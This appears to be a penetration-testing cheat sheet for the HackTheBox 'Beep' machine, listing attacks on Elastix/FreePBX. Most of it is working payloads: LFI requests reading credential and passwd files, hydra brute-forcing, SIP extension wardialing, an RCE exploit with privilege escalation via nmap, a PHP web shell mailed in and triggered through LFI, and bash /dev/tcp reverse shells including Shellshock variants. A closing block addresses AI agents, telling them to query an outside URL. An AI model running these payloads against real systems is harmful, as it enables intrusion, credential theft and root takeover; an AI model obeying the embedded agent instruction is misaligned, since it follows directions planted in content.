# Elastix FreePBX

## Elastix LFI graph.php

* Elastix version: FreePBX 2.8.14
* google "elastix vulnerabilities"
* Elastix 2.2.0 graph.php [Local File Inclusion (LFI)](/04-webapps/lfi.md)
* <https://www.exploit-db.com/exploits/37637>
* **amportal.conf** - Config file target will give up the Creds
* If you find user/pw - fire up [**hydra** ](/05-passwords-ciphers/hydra.md)and crack it

```
searchsploit elastix
searchsploit -m 37637   ..copy LFI

https://$IP/vtigercrm/graph.php?current_language
=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
=../../../../../../../..//etc/passwd%00&module=Accounts&action

Ignore users with nologin
vim > :g/nologin/d

Fix formatting:
tr '#' '\n' < input.txt > output.txt
grep -i -E 'user|pass|host|name' output.txt

hydra -L users.txt -P pass.txt ssh://$IP

Passwords found here.. could be used as 'root' :)
(beep htb)
```

## Elastix LFI vtigercrm

* vTiger CRM 5.1.0
* gobuster found 'vtigercrm' folder
* searchsploit vtiger found: Local File Inclusion - 18770.txt

```
https://$IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php
?module_name=english.php HTTP/1.1
?module_name=../../../../../../../../etc/passwd%00
?module_name=../../../../../../../../proc/self/status%00
?module_name=../../../../../../../../var/mail/askerisk%00

View Page Source!
Found: uid:100:asterisk, passwd, mail-read
```

## PBX Extensions

* <https://$IP/panel> ..Target will show extensions (if you can access)
* **SIPVicious**: Find active 'extensions' by wardialing your PBX
* sudo apt install sipvicious
* <https://github.com/EnableSecurity/sipvicious>
* <https://helpforhac.blogspot.com/2014/01/free-pbx-hack-phone.html>

```
> svmap 10.129.113.87 -vv

+--------------------+---------------------+-------------+
| SIP Device         | User Agent          | Fingerprint |
+====================+=====================+=============+
| 10.129.113.87:5060 | FPBX-2.8.1(1.8.7.0) | disabled    |
+--------------------+---------------------+-------------+

> svwar -h
> svware $IP
> svwar -D -m INVITE $IP
> svwar -D -m INVITE $IP -e100-300 --force

+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233       | reqauth        |
+-----------+----------------+
```

## Remote Code Execution

* FreePBX 2.8.14
* searchsploit freepbx 2.8.14
* Found: 2.10.10 / Elastix 2.2.0 - Remote Code Execution: php/webapps: 18650.py
  * Did you read the notes?
  * Elastix often allows us to run nmap with interactive

```
searchsploit -m 18650
vim 18650

lhost = $MyIP
rhost = $IP
extension='1000'      ..default extension
extension='238'       ..found with svware
url = 'https://....'
urllib.urlopen(url)   ..original
print(url)            ..to troubleshoot

nc -nvlp 4444
whoami 
asterisk

sudo nmap --interactive
nmap> !sh
id ..root
```

## Email php injection

* Requires:
  * smtp:25 open
  * user/pass of email account
  * LFI that can open/execute under same account

```
-------------
smtp:25
telnet $IP	
EHLO mutatedknutz.beep.localdomain   ..extended hello
VRFY hacked@localhost    ..rejected
VRFY asterisk@localhost  ..connect!
mail from:hacked@hacked.com
rcpt to:askerisk@localhost
data
Subject:Testing!
Hello                                        ..test #1
<?php echo "Php success"; ?>                 ..test #2
<?php echo system($_REQUEST['command']); ?>  ..test #3

.
quit

-------------
Use LFI to pull mail/file:
https://$IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php
?module_name=../../../../../../../../var/mail/askerisk%00 
&command=whoami HTTP/1.1
&command=hostname HTTP/1.1
&command=bash -i >& /dev/tcp/10.x.x.x/5151 0>&1 HTTP/1.1
Update as: URL Encoded (with burp)

nc -nvlp 5151
whoami
asterisk !!
```

## Metasploit

* Optional method: "vtiger soap upload"
* MSF SSL Issue/Fix: 6783

```
searchsploit vtigercrm
msf: vtiger_soap_upload
```

## PBX [Shellshock](/04-webapps/03-shellshock.md)

```
() { :;}; echo; /usr/bin/wget https://$IP      ..test
() { :;}; bash -i >& /dev/tcp/$IP/443 0>&1     ..reverse
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/04-webapps/pbx-elastix.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.